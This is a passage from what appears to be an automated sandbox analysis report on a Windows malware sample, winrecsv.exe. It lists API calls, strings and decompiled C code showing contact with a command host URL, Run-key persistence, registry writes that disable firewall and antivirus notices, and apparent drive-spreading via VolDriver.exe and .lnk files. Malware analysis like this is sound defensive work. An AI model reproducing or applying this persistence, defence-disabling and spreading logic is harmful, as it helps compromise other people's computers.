                                                                                  0x00405ac6
                                                                                  0x00405ad6
                                                                                  0x00405ad6
                                                                                  0x00405ae1
                                                                                  0x00405ae7
                                                                                  0x00405b02
                                                                                  0x00405b13
                                                                                  0x00405b23
                                                                                  0x00405b2e
                                                                                  0x00405b39
                                                                                  0x00405b49
                                                                                  0x00405b59
                                                                                  0x00405b64
                                                                                  0x00405b6f
                                                                                  0x00405afc
                                                                                  0x00405afc
                                                                                  0x00405b7f
                                                                                  0x00405b8f
                                                                                  0x00405b9a
                                                                                  0x00405baa
                                                                                  0x00405bb5
                                                                                  0x00405bc0
                                                                                  0x00405bcb
                                                                                  0x00405be4
                                                                                  0x00405bef
                                                                                  0x00405bfc
                                                                                  0x00405cf4
                                                                                  0x00405cf9
                                                                                  0x00405d06
                                                                                  0x00405d11
                                                                                  0x00405d20
                                                                                  0x00405d2d
                                                                                  0x00405d3d
                                                                                  0x00405d43
                                                                                  0x00405d4d
                                                                                  0x00405d63
                                                                                  0x00405d73
                                                                                  0x00405d83
                                                                                  0x00405d8e
                                                                                  0x00405d9e
                                                                                  0x00405da9
                                                                                  0x00405db4
                                                                                  0x00405dc7
                                                                                  0x00405de0
                                                                                  0x00405ded
                                                                                  0x00405dfd
                                                                                  0x00405e0d
                                                                                  0x00405e2d
                                                                                  0x00405e3a
                                                                                  0x00405e41
                                                                                  0x00405e4c
                                                                                  0x00405e57
                                                                                  0x00405e67
                                                                                  0x00405e72
                                                                                  0x00405e7d
                                                                                  0x00405e7d
                                                                                  0x00405e8a
                                                                                  0x00405e95
                                                                                  0x00405e95
                                                                                  0x00405ea2
                                                                                  0x00405ead
                                                                                  0x00405eba
                                                                                  0x00405ec9
                                                                                  0x00405ed4
                                                                                  0x00405ee1
                                                                                  0x00405eec
                                                                                  0x00405f05
                                                                                  0x00405f12
                                                                                  0x00405f32
                                                                                  0x00405f3f
                                                                                  0x00405f4b
                                                                                  0x00405f56
                                                                                  0x00405f61
                                                                                  0x00405f61
                                                                                  0x00405f6e
                                                                                  0x00405f79
                                                                                  0x00405f81
                                                                                  0x00405f91
                                                                                  0x00405f9c
                                                                                  0x00405fac
                                                                                  0x00405fb7
                                                                                  0x00405fb7
                                                                                  0x00405fc4
                                                                                  0x00405fc4
                                                                                  0x00405eba
                                                                                  0x00405fca
                                                                                  0x00405fd4
                                                                                  0x00405fde
                                                                                  0x00405ff9
                                                                                  0x00406006
                                                                                  0x0040600d
                                                                                  0x00406018
                                                                                  0x00406028
                                                                                  0x00406033
                                                                                  0x0040603e
                                                                                  0x0040604d
                                                                                  0x0040604d
                                                                                  0x00406053
                                                                                  0x00406062
                                                                                  0x00406069
                                                                                  0x00406074
                                                                                  0x0040607f
                                                                                  0x0040608a
                                                                                  0x00406095
                                                                                  0x004060a0
                                                                                  0x004060ab
                                                                                  0x004060b6
                                                                                  0x004060c1
                                                                                  0x004060d1
                                                                                  0x004060d1
                                                                                  0x004060e4
                                                                                  0x004060f1
                                                                                  0x004060f8
                                                                                  0x00406105
                                                                                  0x00406114
                                                                                  0x0040611f
                                                                                  0x0040612f
                                                                                  0x0040613a
                                                                                  0x00406145
                                                                                  0x00406150
                                                                                  0x0040615b
                                                                                  0x00406166
                                                                                  0x00406166
                                                                                  0x0040616c
                                                                                  0x00406187
                                                                                  0x0040619d
                                                                                  0x004061a8
                                                                                  0x004061b3
                                                                                  0x004061c3
                                                                                  0x00406181
                                                                                  0x00406181
                                                                                  0x00000000
                                                                                  0x00406187
                                                                                  0x00405c07
                                                                                  0x00405c17
                                                                                  0x00405c22
                                                                                  0x00405c2d
                                                                                  0x00405c38
                                                                                  0x00405c43
                                                                                  0x00405c63
                                                                                  0x00405c6e
                                                                                  0x00405c7b
                                                                                  0x00405cdc
                                                                                  0x00405ce3
                                                                                  0x00405cee
                                                                                  0x00000000
                                                                                  0x00405cee
                                                                                  0x00405c7d
                                                                                  0x00405c98
                                                                                  0x00405cae
                                                                                  0x00405cb9
                                                                                  0x00405cc9
                                                                                  0x00405cd4
                                                                                  0x00405c92
                                                                                  0x00405c92
                                                                                  0x00000000
                                                                                  0x00405c98
                                                                                  0x004061e8
                                                                                  0x004061ee
                                                                                  0x004061ff
                                                                                  0x00406209
                                                                                  0x00406213
                                                                                  0x00406229
                                                                                  0x0040623a
                                                                                  0x00406251
                                                                                  0x00406257
                                                                                  0x00406261
                                                                                  0x00406278
                                                                                  0x0040627e
                                                                                  0x0040628e
                                                                                  0x00406294
                                                                                  0x00406294
                                                                                  0x0040629a
                                                                                  0x0040629d
                                                                                  0x004062ad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062b7
                                                                                  0x004062ee
                                                                                  0x004062ee
                                                                                  0x00406305
                                                                                  0x0040630b
                                                                                  0x00406318
                                                                                  0x00406581
                                                                                  0x00406586
                                                                                  0x004065ac
                                                                                  0x004065cb
                                                                                  0x004065ea
                                                                                  0x00406609
                                                                                  0x00406628
                                                                                  0x00406647
                                                                                  0x00406666
                                                                                  0x00406685
                                                                                  0x00406692
                                                                                  0x00406692
                                                                                  0x004066b8
                                                                                  0x004066d7
                                                                                  0x004066f6
                                                                                  0x00406715
                                                                                  0x00406734
                                                                                  0x00406753
                                                                                  0x00406772
                                                                                  0x00406791
                                                                                  0x0040679e
                                                                                  0x0040679e
                                                                                  0x004067a9
                                                                                  0x004067b9
                                                                                  0x004067cb
                                                                                  0x004067e2
                                                                                  0x004067fc
                                                                                  0x00406814
                                                                                  0x0040681f
                                                                                  0x00406834
                                                                                  0x0040683f
                                                                                  0x00406854
                                                                                  0x0040685f
                                                                                  0x00406865
                                                                                  0x0040686f
                                                                                  0x00406882
                                                                                  0x0040688c
                                                                                  0x00406896
                                                                                  0x0040689b
                                                                                  0x004068ad
                                                                                  0x004068b4
                                                                                  0x004068c9
                                                                                  0x004068cf
                                                                                  0x004068e4
                                                                                  0x004068eb
                                                                                  0x00406900
                                                                                  0x00406907
                                                                                  0x0040690c
                                                                                  0x00000000
                                                                                  0x00406913
                                                                                  0x00406329
                                                                                  0x00406344
                                                                                  0x00406362
                                                                                  0x00406368
                                                                                  0x00406381
                                                                                  0x00406460
                                                                                  0x00406465
                                                                                  0x00406483
                                                                                  0x00406489
                                                                                  0x004064a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004064b1
                                                                                  0x004064d7
                                                                                  0x00406562
                                                                                  0x00406569
                                                                                  0x0040656e
                                                                                  0x00406577
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040657b
                                                                                  0x0040657b
                                                                                  0x004064e3
                                                                                  0x004064f2
                                                                                  0x004064f8
                                                                                  0x00406501
                                                                                  0x00406508
                                                                                  0x0040650f
                                                                                  0x00406527
                                                                                  0x0040654f
                                                                                  0x0040655c
                                                                                  0x00000000
                                                                                  0x0040655c
                                                                                  0x00406390
                                                                                  0x004063b6
                                                                                  0x00406441
                                                                                  0x00406448
                                                                                  0x0040644d
                                                                                  0x00406456
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040645a
                                                                                  0x0040645a
                                                                                  0x004063c2
                                                                                  0x004063d1
                                                                                  0x004063d7
                                                                                  0x004063e0
                                                                                  0x004063e7
                                                                                  0x004063ee
                                                                                  0x00406406
                                                                                  0x0040642e
                                                                                  0x0040643b
                                                                                  0x00000000
                                                                                  0x0040643b
                                                                                  0x0040632d
                                                                                  0x0040632d
                                                                                  0x004062b9
                                                                                  0x004062bf
                                                                                  0x004062c3
                                                                                  0x004062d0
                                                                                  0x004062d4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062d6
                                                                                  0x004062dd
                                                                                  0x004062ec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062ec
                                                                                  0x004062fa
                                                                                  0x004062fc
                                                                                  0x004062ff
                                                                                  0x00000000
                                                                                  0x004062ff
                                                                                  0x00406203

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001B58), ref: 00405A2E
                                                                                  • FindWindowA.USER32 ref: 00405A61
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405A7F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A8F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A9F
                                                                                  • FindWindowA.USER32 ref: 00405AAC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AC6
                                                                                  • MoveFileA.KERNEL32 ref: 00405AD6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AE1
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B13
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 00405B23
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405B2E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B39
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B49
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B59
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405B64
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405B6F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405B7F
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B8F
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B9A
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405BAA
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405BB5
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BC0
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BCB
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405BDE
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405BEF
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405C07
                                                                                  • MoveFileA.KERNEL32 ref: 00405C17
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405C22
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405C2D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C38
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405C43
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405C5D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C6E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405CAE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CB9
                                                                                  • MoveFileA.KERNEL32 ref: 00405CC9
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405CD4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405CE3
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405CEE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CF9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405D06
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405D11
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00405D20
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405D2D
                                                                                  • MoveFileA.KERNEL32 ref: 00405D3D
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D83
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405D8E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D9E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405DA9
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405DB4
                                                                                  • FindWindowA.USER32 ref: 00405DC1
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405DDA
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405DFD
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405E0D
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405E27
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405E41
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405E4C
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405E57
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,argarhrharharfafrahth), ref: 00405E67
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405E72
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405E7D
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405E8A
                                                                                  • Sleep.KERNEL32(00000DAC), ref: 00405E95
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405EA2
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405EAD
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00405EC9
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405ED4
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405EE1
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405EEC
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405EFF
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405F2C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405F4B
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405F56
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405F61
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405F6E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F79
                                                                                  • Sleep.KERNEL32(00000064), ref: 00405F81
                                                                                  • MoveFileA.KERNEL32 ref: 00405F91
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F9C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405FAC
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405FB7
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC4
                                                                                  • FindWindowA.USER32 ref: 00405FF3
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040600D
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406018
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00406028
                                                                                  • Sleep.KERNEL32(00001388), ref: 00406033
                                                                                  • Sleep.KERNEL32(00001388), ref: 0040603E
                                                                                  • PathFileExistsA.SHLWAPI(aefafugaugfgauegf), ref: 0040605A
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00406069
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406074
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040607F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040608A
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406095
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060A0
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060AB
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060B6
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060C1
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 004060D1
                                                                                  • FindWindowA.USER32 ref: 004060DE
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060F8
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00406105
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00406114
                                                                                  • Sleep.KERNEL32(00003A98), ref: 0040611F
                                                                                  • MoveFileA.KERNEL32 ref: 0040612F
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 0040613A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406145
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406150
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040615B
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406166
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 0040619D
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004061A8
                                                                                  • Sleep.KERNEL32(00002328), ref: 004061B3
                                                                                  • MoveFileW.KERNEL32(argarhrharharfafrahth,4yy4w4yw4fwgwgw), ref: 004061C3
                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,984658), ref: 004061E8
                                                                                  • GetLastError.KERNEL32 ref: 004061F4
                                                                                  • ExitProcess.KERNEL32 ref: 00406203
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00414A30,00000105), ref: 00406229
                                                                                  • PathFindFileNameW.SHLWAPI(00414A30), ref: 00406234
                                                                                  • wsprintfW.USER32 ref: 00406251
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00406261
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00406278
                                                                                  • ExitProcess.KERNEL32 ref: 0040632D
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00406344
                                                                                  • wsprintfW.USER32 ref: 00406362
                                                                                  • CopyFileW.KERNEL32(00414A30,?,00000000), ref: 00406379
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 00406390
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004063AE
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040642E
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040643B
                                                                                  • ExitProcess.KERNEL32 ref: 0040645A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406465
                                                                                  • wsprintfW.USER32 ref: 00406483
                                                                                  • CopyFileW.KERNEL32(00414A30,?,00000000), ref: 0040649A
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 004064B1
                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004064CF
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040654F
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040655C
                                                                                  • ExitProcess.KERNEL32 ref: 0040657B
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406586
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 004065A4
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004065CB
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004065EA
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406609
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406628
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406647
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406666
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406685
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00406692
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 004066B0
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004066D7
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004066F6
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406715
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406734
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406753
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406772
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406791
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040679E
                                                                                  • Sleep.KERNEL32(000001F4), ref: 004067A9
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004067CB
                                                                                  • wsprintfW.USER32 ref: 004067E2
                                                                                  • wsprintfW.USER32 ref: 004067FC
                                                                                  • CreateThread.KERNEL32 ref: 00406814
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040681F
                                                                                  • CreateThread.KERNEL32 ref: 00406834
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040683F
                                                                                  • CreateThread.KERNEL32 ref: 00406854
                                                                                  • Sleep.KERNEL32(00002710), ref: 0040685F
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040687C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Delete$Sleep$Move$Value$Internet$Window$CloseOpen$FindHandle$Createwsprintf$ExitProcess$ForegroundShowThread$AttributesCopyEnvironmentExpandNamePathStrings$ErrorEventExistsLastModuleMutexStartup
                                                                                  • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tncmds.dat$%s\tnnodes.dat$%userprofile%$%windir%$(#$,$2#$2dgd828d8g8fg8g8g$4yy4w4yw4fwgwgw$579795729858927452784$7$984658$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$aefafugaugfgauegf$aefyaiegfayegfg$argarhargafafargh$argarhrharharfafrahth$feu8gf8g2gf8g2fg$ffag8f2g8fg82g8f8g8fg$http://2462462645.fr/$ttyu8ruy8uy8u8yu$winrecsv.exe
                                                                                  • API String ID: 1472887078-2105414062
                                                                                  • Opcode ID: e9b8caad3e6c7c72c08a18d3b1dd795e6a737fde68c8f804354bfe590bd1a1d4
                                                                                  • Instruction ID: 5381a988ab4d71a95ab7e29ec0f43e912bf8196cdff92c6a99a63db8bd3eacf6
                                                                                  • Opcode Fuzzy Hash: e9b8caad3e6c7c72c08a18d3b1dd795e6a737fde68c8f804354bfe590bd1a1d4
                                                                                  • Instruction Fuzzy Hash: 5472EF71680314ABD7209F90AC4AFD97B74BB48B06F2085A5F709B61D0DAF85AC4CF5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 104 404bd0-404be5 _chkstk 105 404be7-404be9 104->105 106 404bee-404ca0 wsprintfW * 5 PathFileExistsW 104->106 109 4050a5-4050a8 105->109 107 404ca2-404cc3 call 40d530 106->107 108 404ce4-404cf3 PathFileExistsW 106->108 107->108 118 404cc5-404cde SetFileAttributesW DeleteFileW 107->118 111 404d60-404d6f PathFileExistsW 108->111 112 404cf5-404d04 PathFileExistsW 108->112 116 404d71-404d77 111->116 117 404db6-404dd7 FindFirstFileW 111->117 114 404d06-404d17 CreateDirectoryW 112->114 115 404d28-404d37 PathFileExistsW 112->115 114->115 121 404d19-404d22 SetFileAttributesW 114->121 115->111 122 404d39-404d4f CopyFileW 115->122 123 404d91-404da4 call 404980 116->123 124 404d79-404d8f call 404980 116->124 119 404ddd-404e95 117->119 120 40509f 117->120 118->108 126 404e9f-404eb3 lstrcmpW 119->126 120->109 121->115 122->111 127 404d51-404d5a SetFileAttributesW 122->127 133 404da7-404db0 SetFileAttributesW 123->133 124->133 130 404eb5-404ec9 lstrcmpW 126->130 131 404ecb 126->131 127->111 130->131 134 404ed0-404ee1 130->134 135 405076-40508c FindNextFileW 131->135 133->117 136 404ef2-404ef9 134->136 137 404ee3-404eec 134->137 135->126 138 405092-405099 FindClose 135->138 139 404f27-404f30 136->139 140 404efb-404f18 lstrcmpiW 136->140 137->136 138->120 143 404f32 139->143 144 404f37-404f48 139->144 141 404f1a 140->141 142 404f1c-404f23 140->142 141->137 142->139 143->135 145 404f59-404f60 144->145 146 404f4a-404f53 144->146 147 404fd0-404fd9 145->147 148 404f62-404f7f PathMatchSpecW 145->148 146->145 149 404fe0-404fef PathFileExistsW 147->149 150 404fdb 147->150 151 404f81 148->151 152 404f83-404fc9 wsprintfW SetFileAttributesW DeleteFileW 148->152 153 404ff1 149->153 154 404ff6-405046 wsprintfW * 2 149->154 150->135 151->146 152->147 153->135 155 405060-405070 MoveFileExW 154->155 156 405048-40505e call 404a90 154->156 155->135 156->135
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404BD0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				short _v1564;
                                                                                  				short _v2084;
                                                                                  				intOrPtr _v2088;
                                                                                  				short _v2612;
                                                                                  				short _v3132;
                                                                                  				char _v3133;
                                                                                  				struct _WIN32_FIND_DATAW _v3732;
                                                                                  				short _v4252;
                                                                                  				void* _v4256;
                                                                                  				short _v4780;
                                                                                  				intOrPtr _v4784;
                                                                                  				WCHAR* _v4788;
                                                                                  				WCHAR* _v4792;
                                                                                  				WCHAR* _v4796;
                                                                                  				WCHAR* _v4800;
                                                                                  				WCHAR* _v4804;
                                                                                  				intOrPtr _v4808;
                                                                                  				WCHAR* _v4812;
                                                                                  				WCHAR* _v4816;
                                                                                  				WCHAR* _v4820;
                                                                                  				WCHAR* _v4824;
                                                                                  				WCHAR* _v4828;
                                                                                  				WCHAR* _v4832;
                                                                                  				WCHAR* _v4836;
                                                                                  				WCHAR* _v4840;
                                                                                  				WCHAR* _v4844;
                                                                                  				WCHAR* _v4848;
                                                                                  				WCHAR* _v4852;
                                                                                  				WCHAR* _v4856;
                                                                                  				WCHAR* _v4860;
                                                                                  				signed char _v4861;
                                                                                  				signed char _v4862;
                                                                                  				signed int _v4868;
                                                                                  				signed int _v4872;
                                                                                  				intOrPtr _t167;
                                                                                  				intOrPtr _t195;
                                                                                  				void* _t218;
                                                                                  				void* _t219;
                                                                                  				void* _t224;
                                                                                  
                                                                                  				L0040F1AA();
                                                                                  				if((_a12 & 0x00080000) != 0) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_v2088 = 0x4140cc;
                                                                                  				_v3133 = 0;
                                                                                  				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                  				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                  				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                  				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                  				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                  				_t224 = _t219 + 0x48;
                                                                                  				if(PathFileExistsW( &_v4780) != 0) {
                                                                                  					_t167 = E0040D530( &_v4780);
                                                                                  					_t224 = _t224 + 4;
                                                                                  					_v4784 = _t167;
                                                                                  					_t195 =  *0x414410; // 0x0
                                                                                  					if(_t195 != _v4784) {
                                                                                  						SetFileAttributesW( &_v4780, 0x80);
                                                                                  						DeleteFileW( &_v4780);
                                                                                  					}
                                                                                  				}
                                                                                  				if(PathFileExistsW( &_v4780) == 0) {
                                                                                  					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4252, 2);
                                                                                  					}
